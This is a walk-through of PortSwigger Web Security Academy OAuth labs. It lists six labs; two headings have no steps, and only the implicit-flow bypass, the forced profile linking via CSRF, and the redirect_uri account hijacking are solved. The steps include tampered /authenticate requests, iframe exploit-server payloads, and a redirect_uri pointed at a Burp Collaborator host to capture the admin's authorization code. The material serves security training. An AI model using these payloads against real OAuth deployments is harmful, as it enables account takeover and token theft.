Walk-through of the OAuth authentication lab on PortSwigger Web Security Academy.
- Apprentice – Authentication bypass via OAuth implicit flow
- Practitioner – SSRF via OpenID dynamic client registration
- Practitioner – Forced OAuth profile linking
- Practitioner – OAuth account hijacking via redirect_uri
- Practitioner – Stealing OAuth access tokens via an open redirect
- Expert – Stealing OAuth access tokens via a proxy page
Apprentice – Authentication bypass via OAuth implicit flow
To solve the lab, log in to Carlos’s account. His email address is carlos@carlos-montoya.net.
- Click on My account.
- A redirection to an oauth server will display a Sign-in form. Enter credentials wiener/peter and click Sign-in.
WeLikeToBlog is requesting access to:
Profile
Email
Click on Continue.
Inspect requests. This request is interesting as it uses the token as a password.
POST /authenticate HTTP/1.1
Host: <LAB ID>.web-security-academy.net
...
{"email":"wiener@hotdog.com","username":"wiener","token":"c_JLJvXGtqQ3g76r9A7BzPKhHoFZmY_v88Osju8q-NH"}
Send the request to the Repeater module. Modify the email address and username and forward the request.
POST /authenticate HTTP/1.1
Host: <LAB ID>.web-security-academy.net
...
{"email":"carlos@carlos-montoya.net","username":"carlos","token":"c_JLJvXGtqQ3g76r9A7BzPKhHoFZmY_v88Osju8q-NH"}
HTTP/1.1 302 Found
Location: /
Set-Cookie: session=ZIoPbpvKRibZhVULkRWzQh0ak7zUm4af; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Change the value of the session cookie in the browser to this new value to be logged in as carlos.
Practitioner – SSRF via OpenID dynamic client registration
Practitioner – Forced OAuth profile linking
This lab gives you the option to attach a social media profile to your account so that you can log in via OAuth instead of using the normal username and password. Due to the insecure implementation of the OAuth flow by the client application, an attacker can manipulate this functionality to obtain access to other users’ accounts. To solve the lab, use a CSRF attack to attach your own social media profile to the admin user’s account on the blog website, then access the admin panel and delete carlos. You can log in to your own accounts using the following credentials: Blog website account: wiener:peter, Social media profile: peter.wiener:hotdog
- Click on My Account.
- Enter credentials winer:peter and click Log in. Do NOT use Login with social media.
POST /login HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<token>
[...]
csrf=<csrf-token>&username=wiener&password=peter
A request to the My account page contains a link to attach a social profile.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 3491
[...]
<p>Your social profile username is: </p>
<p><a href='https://oauth-<SOME ID>.oauth-server.net/auth?client_id=<CLIENT ID>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-linking&response_type=code&scope=openid%20profile%20email'>Attach a social profile</a></p>
Notice the parameter “redirect_uri=https://.web-security-academy.net/oauth-linking” to oauth-linking and does NOT contain a state parameter to protect against CSRF.
- Click on Attach a social profile.
- Enter credentials peter.wiener:hotdog and click sign in.
WeLikeToBlog is requesting access to:
Profile
Email
Click Continue.
You have successfully linked your social media account
- Click Continue.
- Click on Log out.
- Click on My account.
There is a button Login with social media.
<a class=button style='display: inline-block; background: rgb(77, 144, 254)' href='https://oauth-<SOME ID>.oauth-server.net/auth?client_id=<CLIENT ID>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-login&response_type=code&scope=openid%20profile%20email'>Login with social media</a>
- Click on Login with social media.
- Click Continue. You are automatically logged in.
- Intercept requests in Burp Suite (click Intercept->Intercept is off).
- Click on Attach a social profile.
- Forward all requests until:
GET /oauth-linking?code=<CODE> HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<token>
[...]
Right-click on this request and select “Copy URL”.
Drop the request. This is important to ensure that the code is not used and remains valid.
- Stop interception.
- Click on Log out.
Click on Go to exploit server and enter this payload in the body that will send the request for linking the social media account.
<iframe src="https://<LAB ID>.web-security-academy.net/oauth-linking?code=<CODE>"></iframe>
- Click on Deliver exploit to victim.
- Click on My Account and click on Login with social media.
You are now logged in as the administrator. Click on Admin panel and delete user carlos to solve the lab.
Practitioner – OAuth account hijacking via redirect_uri
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users’ accounts. To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user carlos. The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service. You can log in with your own social media account using the following credentials: wiener:peter.
- Click on My Account. You will be redirected to /social-login, which will redirect to the OAuth server.
- Enter credentials winer:peter and click Sign-in.
POST /interaction/DVJvHBytwKxhRI5FjC3we/login HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _interaction=DVJvHBytwKxhRI5FjC3we
[...]
username=wiener&password=peter
- Click Continue to authorize access to your profile and email to WeLikeToBlog.
- Click Continue to complete login.
- Click on My account, then Log out.
- Click on My account. Click on Continue.
You are now automatically logged in without providing credentials since you have an active sessions with the OAuth service.
Find the most recent authorization request and send it to the Repeater module.
GET /auth?client_id=<client id>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _session=KPpuCth-CuTO4jj8q8uvw; _session.legacy=KPpuCth-CuTO4jj8q8uvw
[...]
HTTP/2 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR
Content-Type: text/html; charset=utf-8
Set-Cookie: _session=KPpuCth-CuTO4jj8q8uvw; path=/; expires=Thu, 10 Aug 2023 13:50:09 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=KPpuCth-CuTO4jj8q8uvw; path=/; expires=Thu, 10 Aug 2023 13:50:09 GMT; secure; httponly
Date: Thu, 27 Jul 2023 13:50:09 GMT
Keep-Alive: timeout=5
Content-Length: 289
Redirecting to <a href="https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR">https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR</a>.
The server response redirects to the value of the redirect_uri parameter. Add your Burp Collaborator ID to the redirect_uri parameter.
GET /auth?client_id=xdwpxjbrrcoicybrsnpbi&redirect_uri=https://<BURP COLLABORATOR ID>.oastify.com&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _session=KPpuCth-CuTO4jj8q8uvw; _session.legacy=KPpuCth-CuTO4jj8q8uvw
[...]
HTTP/2 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S
[...]
Redirecting to <a href="https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S">https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S</a>.
In the Repeater module, follow the URL after sending the request. The server redirects to the Burp Collaborator URL and the Burp Collaborator receives an HTTP request.
GET /?code=g5_UOJbWLFD7-xa8hLLvuHQbuxi8v-T7baYyUJSENhk HTTP/2
Host: <BURP COLLABORATOR ID>.oastify.com
[...]
- Click on Go to exploit server.
- In the Body, enter the payload below.
- Click Store.
<iframe src="https://oauth-<OAUTH LAB ID>.oauth-server.net/auth?client_id=<client id>&redirect_uri=https://<BURP COLLABORATOR ID>&response_type=code&scope=openid%20profile%20email"></iframe>
Click on Deliver exploit to victim. The Burp Collaborator receives a request.
GET /?code=s44ZV69C1TamWXDUpCXludTZvi9RlcRb7ybh8sx_EfI HTTP/1.1
Host: <LAB ID>.oastify.com
[...]
We get code “s44ZV69C1TamWXDUpCXludTZvi9RlcRb7ybh8sx_EfI”.
- Click on My account.
- Click on Log out.
Enter this URL in your browser:
https://<LAB ID>.web-security-academy.net/oauth-callback?code=<previously obtained code>
Click on Continue. You are now logged in as the administrator. Click on Admin panel and delete user carlos to solve the lab.